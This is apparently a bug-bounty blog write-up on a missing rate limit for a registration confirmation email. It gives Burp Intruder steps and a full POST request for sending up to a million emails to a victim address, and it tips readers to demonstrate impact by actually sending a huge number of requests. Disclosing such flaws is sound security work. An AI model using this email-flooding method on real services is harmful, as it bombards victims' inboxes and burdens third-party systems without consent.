No Rate limiting for confirmation email lead to huge Mass mailings (Gives you a Small $$ bounty or hall of fame)
Hello, Hunters. I know You are here because you are struggling or want to advance in your career. Believe me, things take time. Be consistent, continue to learn, and never deceive yourself. If you follow these three mantras, you will undoubtedly achieve success.
Rate Limiting:
If there is no rate restriction, there is no safeguard against the many requests you made quickly. There will not be a rate restriction if the repetition yields no errors after 50, 100, or 1000 repetitions.
URL Affected: https://xyz.my/index.php/apps/registration/
Step to Reproduce:
- Go to the URL https://xyz.my/index.php/apps/registration/
- Add the victim emails.
- Sent request to burp-intruder, and cleared all payloads
§ - In the payloads, set a
null-payloadsand run start attack - Boom 1Million request sent to victim-email.
Request part:
POST /index.php/apps/registration/ HTTP/1.1
Host: xyz.my
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Content-Type: application/x-www-form-urlencoded
Content-Length: 142
Origin: null
Connection: close
Upgrade-Insecure-Requests: 1
email=victimattack%40gmail.com&requesttoken=Cdt30n8l%2FBhsd0fTp4wDDyvOvA26umsBZgymNLTrJWI%3D%3AZL8W4SURzVcIIAm06cNxOlm5jUrP1QloEW3RWO2SQQA%3D
In request part the highlighted part should be selected as payload position.
Response Part:
HTTP/1.1 200 OK
Date: Sat, 03 Oct 2020 11:58:21 GMT
Server: Apache/2.4.29 (Ubuntu)
Strict-Transport-Security: max-age=15552000; includeSubDomains; preload
Referrer-Policy: no-referrer
X-Content-Type-Options: nosniff
X-Download-Options: noopen
X-Frame-Options: SAMEORIGIN
X-Permitted-Cross-Domain-Policies: none
X-Robots-Tag: none
X-XSS-Protection: 1; mode=block
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-cache, no-store, must-revalidate
Pragma: no-cache
Vary: Accept-Encoding
Content-Length: 13400
Connection: close
Content-Type: text/html; charset=UTF-8
Tips: Mostly the time the company will neglect this vulnerability, in that case, you can show them the impact by sending a huge request. Although this vulnerability is eligible for 2 digit bounty only.
Thank you for reading !! hope you get to learn some tricks.
Subscribe to the Shuttlertech YouTube channel for more of this type of content and to watch live POCs & To advance your career connect with me 1:1 over topmate .
I will ensure you that I will write more interesting and knowledge-sharing writeups, to encourage me to follow me on medium and click the clap icon.
Disclaimer: My write-up comes from my own achievements & Some time from different Learning platforms Do not use this methodology without concern for the company. I am just sharing this for learning purposes.